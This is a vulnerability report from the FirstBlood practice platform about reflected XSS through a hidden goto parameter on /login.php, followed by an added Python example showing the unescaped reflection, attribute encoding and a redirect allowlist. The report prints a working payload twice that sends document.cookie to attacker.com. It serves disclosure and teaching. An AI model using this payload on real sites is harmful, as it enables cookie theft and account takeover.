FirstBlood-#791 — Reflective XSS on Login page using the hidden "goto" parameter
This issue was discovered on FirstBlood v2
On 2021-10-28, xnl-h4ck3r Level 4 reported:
Summary
A reflected XSS vulnerability exists on /login.php using the hidden goto parameter.
Description
There is a reflected XSS on the /login.php endpoint using the hidden goto parameter, which leads to account takeover.
Steps to reproduce
- The goto parameter was a hidden parameter found in Version 1. When used on the login.php endpoint it is reflected in the HTML source code:
- Go to /login.php and log in as an existing user.
- Go to the following endpoint and observe that the XSS payload redirects the user to an attacker's site and leaks the cookies in the URL:
/login.php?goto=xyz%22%20autofocus%20onfocusin=%22window.location.href=`http://attacker.com/?${document.cookie}`%22%3E

Impact
An attacker can craft a malicious link to send to a user. If the user is already authenticated, the link can send the user's cookies to the attacker via an open redirect and then take over the user's account.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: xyz%22%20autofocus%20onfocusin=%22window.location.href=`http://attacker.com/?${document.cookie}`%22%3E
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.
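The reflection the report describes, and the attribute encoding that the legacy login.php was missing, as an added example in Python that is not FirstBlood's code. The hidden `<input name="goto">` template, the function names, and the assumption that goto is also used as a post-login redirect target are all assumptions made for the illustration; the payload string is the one from the report.

```python
"""
Added example (not FirstBlood's code): how a goto value reflected unescaped
into an <input> attribute breaks out of that attribute, what HTML attribute
encoding does to the same value, and an allowlist for goto as a redirect
target. Template and function names are assumptions.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The report's link, exactly as it would be sent to a victim (URL-encoded).
REPORT_URL = (
    "/login.php?goto=xyz%22%20autofocus%20onfocusin=%22window.location.href="
    "`http://attacker.com/?${document.cookie}`%22%3E"
)


def goto_from_url(url: str) -> str:
    """Return the decoded goto parameter as the server-side code would see it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("goto", [""])[0]


def render_vulnerable(goto: str) -> str:
    """Assumed legacy template: the value is concatenated in without encoding."""
    return f'<input type="hidden" name="goto" value="{goto}">'


def render_hardened(goto: str) -> str:
    """Same template with HTML attribute encoding (quotes included)."""
    # html.escape(quote=True) turns & < > " ' into entities, so the value can
    # never terminate the value="..." attribute or start a new one.
    return f'<input type="hidden" name="goto" value="{html.escape(goto, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collects the attributes the browser would actually see on the <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.found: list[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.found.append(dict(attrs))


def input_attributes(markup: str) -> dict:
    """Parse the rendered tag and return its attribute map (first <input>)."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.found[0] if parser.found else {}


def safe_redirect_target(goto: str, default: str = "/") -> str:
    """Assumed post-login redirect: only accept a same-site absolute path.

    Rejects scheme-qualified URLs, protocol-relative //host URLs and
    backslash tricks, so goto cannot send the user off-site.
    """
    if goto.startswith("/") and not goto.startswith(("//", "/\\")) and "\\" not in goto:
        return goto
    return default


if __name__ == "__main__":
    goto = goto_from_url(REPORT_URL)
    print("decoded goto :", goto)
    print("vulnerable   :", input_attributes(render_vulnerable(goto)))
    print("hardened     :", input_attributes(render_hardened(goto)))
    print("redirect     :", safe_redirect_target(goto))
```

Running the script shows the difference the encoding makes: the vulnerable render yields an `<input>` whose `value` is just `xyz` plus injected `autofocus` and `onfocusin` attributes, while the hardened render yields a single `value` attribute holding the whole string as inert text. The redirect check is a separate control for the parameter's intended use and does not replace output encoding.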